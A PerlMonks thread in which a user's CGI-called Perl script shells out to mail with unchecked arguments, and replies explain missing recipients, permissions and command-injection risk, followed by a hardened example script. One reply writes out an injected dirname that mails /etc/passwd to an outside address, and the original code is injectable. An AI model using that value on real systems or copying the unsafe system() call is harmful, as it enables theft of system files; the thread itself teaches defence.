bikeguy has asked for the wisdom of the Perl Monks concerning the following question:

I know - email has been discussed like 45,000 times on here. But I have a little issue I can't seem to resolve. I am trying to send an email like so:
    $dirname = $ARGV[0];
    $fname = $ARGV[1];
    ...
    $status = system("mail -s \"test subject\" < $dirname$fname");

Now, if I run this from a command line it works fine. However, if this is in a separate program called from a CGI script, it sends an empty email and reports back that the email will have a null body.

I would like to avoid using any modules here, and the problem with piping it back through is that I would need to read the file I'm trying to use as the message body. Not a huge deal, but if I can accomplish this as one line I'd like to.

Does anyone have any ideas as to why this won't run under this circumstance? I have even tried hardcoding the filename in, same thing. I'm stumped!

Replies are listed 'Best First'.
Re: Yet another email question
by amphiplex (Monk) on Jul 23, 2002 at 09:42 UTC
    Hi !

    I can't believe that this works; you have not specified any recipients? Or are you using some custom mail?

    Aside from this:
    • You really should be using a module, especially when using this in a CGI-Script
    • If you absolutely must use the mail binary, make sure to check the variables. If you don't check the user input here, someone could, for example, give you a dirname of "; mail foo@hacker.com < /etc/passwd". So strip out at least: [&;<>"'`|]
    • use the absolute path to your mail binary, something like /usr/bin/mail

    ---- amphiplex

      No no no. Don't strip out blacklisted characters. Instead, strip out any but whitelisted ones. For example, s/\W+//g. It is too easy to overlook something otherwise.

      bikeguy: you probably want to read perlsec. Also, Ovid's excellent CGI course has a good easily digestible discussion of CGI script security.

      Makeshifts last the longest.

Re: Yet another email question
by Ionitor (Scribe) on Jul 23, 2002 at 14:55 UTC
    amphiplex and Aristotle are very right--you have some major security issues to worry about here, and using a command line program instead of a mail module is neither safe nor portable.

    However, I will say that there's a good chance that you don't have your permissions set correctly. It's likely that you own the file, so you can read it when you use the script at the command line, but the web server doesn't have the right permissions.
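
The points raised in the replies above (allowlist validation, an absolute path to the mail binary, and the file-permission check), combined in one script. This is an added example, not code from any poster in the thread; it rejects a bad name rather than stripping characters from it. The recipient, the base directory, the location of mail and the helper names safe_name and send_file are assumptions, and the list form of a pipe open needs Perl 5.8 or later.

```perl
#!/usr/bin/perl -T
# Taint mode: invoke as ./script or "perl -T script" (see perlsec).
use strict;
use warnings;

# Taint mode requires a known-safe environment before running a program.
$ENV{PATH} = '/usr/bin:/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

my $MAIL    = '/usr/bin/mail';          # absolute path; location is an assumption
my $BASEDIR = '/var/spool/webmail';     # hypothetical directory of message bodies
my $RCPT    = 'webmaster@example.com';  # hypothetical fixed recipient

# Allowlist check: return the untainted name only if it consists of
# letters, digits, '_', '.' and '-' and does not start with a dot.
sub safe_name {
    my ($name) = @_;
    return undef unless defined $name;
    return $name =~ /\A([A-Za-z0-9_][A-Za-z0-9_.-]*)\z/ ? $1 : undef;
}

sub send_file {
    my ($fname) = @_;
    my $clean = safe_name($fname);
    defined $clean or die "rejected file name\n";
    my $path = "$BASEDIR/$clean";

    # Read the body ourselves, so a permissions problem under the web
    # server's account shows up as an error instead of an empty message.
    open(my $in, '<', $path) or die "cannot read $path: $!\n";

    # List-form pipe open: no shell is involved, so each argument reaches
    # mail as-is and shell metacharacters have no special meaning.
    open(my $out, '|-', $MAIL, '-s', 'test subject', $RCPT)
        or die "cannot run $MAIL: $!\n";
    print {$out} $_ while <$in>;
    close($in);
    close($out) or die "mail failed: status $?\n";
    return 1;
}

send_file($ARGV[0]) if @ARGV;
```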